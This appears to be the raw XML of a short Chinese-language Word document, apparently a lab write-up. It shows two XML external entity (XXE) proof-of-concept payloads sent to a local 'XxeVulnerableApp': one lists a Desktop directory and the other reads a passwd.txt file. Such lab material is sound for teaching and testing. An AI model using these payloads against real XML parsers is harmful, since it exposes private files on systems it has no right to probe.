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运行</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>XxeVulnerableApp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件，访问</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>http://127.0.0.1:8099/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>读取目录</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>POC xml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件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1E1F22"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;?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BCBEC4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="6AAB73"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>="UTF-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;!DOCTYPE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data [</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ELEMENT data (content)&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ELEMENT content (#PCDATA)&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ENTITY xxe SYSTEM "file:///C:/Users/luke10481/Desktop"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ]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t>&lt;data&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;content&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="56A8F5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;xxe;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&lt;/content&gt;</w:t>
        <w:br/>
        <w:t>&lt;/data&gt;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页面回显读取目录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5200" cy="5677535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读取文件</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>POC xml</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件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1E1F22"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;?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BCBEC4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="6AAB73"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>="UTF-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="D5B778"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">&lt;!DOCTYPE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data [</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ELEMENT data (content)&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ELEMENT content (#PCDATA)&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;!ENTITY xxe SYSTEM "file:///C:/Users/luke10481/Desktop/passwd.txt"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ]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t>&lt;data&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;content&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:color w:val="56A8F5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;xxe;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&lt;/content&gt;</w:t>
        <w:br/>
        <w:t>&lt;/data&gt;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3015" cy="230886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JetBrains Mono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宋体" w:cs="Lucida Sans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LibreOffice/7.5.1.2$Windows_X86_64 LibreOffice_project/fcbaee479e84c6cd81291587d2ee68cba099e129</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>2</Pages>
  <Words>73</Words>
  <Characters>472</Characters>
  <CharactersWithSpaces>584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2023-05-14T17:16:40Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-14T17:28:48Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>